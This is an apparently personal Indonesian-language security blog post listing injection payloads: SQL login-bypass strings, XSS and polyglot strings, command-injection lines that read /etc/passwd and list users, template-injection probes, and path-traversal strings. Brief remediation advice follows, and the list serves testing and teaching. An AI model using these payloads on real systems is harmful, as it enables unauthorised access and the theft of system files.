Security Researcher - SQLi Authentication Bypass, XSS, XSS Polyglots, Command Injection, SSTI, Path Traversal

SQLi Auth Bypass lewati login, XSS dan XSS Polyglots eksekusi skrip di browser, Command Injection jalanin perintah server, SSTI injeksi template, Path Traversal akses file sensitif.

SQLi Authentication Bypass

  • ' or 1=1 limit 1 -- -+
  • '="or'

XSS

  • "><script>alert('vulnerable')</script>
  • "><img src=vulnerable onerror=alert('vulnerable') />
  • "><svg onload=alert('vulnerable')>
  • "><input type=image src onerror="alert('vulnerable')">

XSS Polyglots

Poliglot XSS adalah string yang mampu disuntikkan ke dalam beberapa konteks yang berbeda dan masih menghasilkan eksekusi JavaScript, ini bekerja di lebih dari 20 konteks.

  • payload for xss polyglots
    1
    jaVasCript:/*-/*`/*`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>x3csVg/<sVg/oNloAd=alert()//>x3e

Kelemahan poliglot adalah mudah terdeteksi oleh firewall aplikasi web (WAF), mereka cenderung cukup panjang dalam hal panjang karakter, dan mereka tidak berfungsi di setiap konteks.

Command Injection

  • ; uname -a; cat /etc/passwd
  • & cmd /c "whoami & net user"

SSTI

  • {{ 13*37 }}
  • ${{13*37}}
  • <%= 13*37 %>
  • #{13*37}
  • {{= 13*37 }}

Path Traversal

  • ../../../etc/passwd
  • /etc/passwd
  • ....//....//....//etc/passwd
  • ..%252f..%252f..%252fetc/passwd
  • ../../../etc/passwd%00.png

Untuk SQLi Auth Bypass, gunakan prepared statements dan validasi input. Untuk XSS dan XSS Polyglots, lakukan output encoding dan sanitasi. Untuk Command Injection, batasi eksekusi dan validasi input. Untuk SSTI, hindari evaluasi input langsung. Untuk Path Traversal, batasi akses dan normalisasi path.


Security Researcher - SQLi Authentication Bypass, XSS, XSS Polyglots, Command Injection, SSTI, Path Traversal
https://1337rokudenashi.github.io/1a2b3c4d-5e6f-47b8-9a0b-1c2d3e4f5a6b/
Author
1337rokudenashi
Posted on
March 31, 2024
Licensed under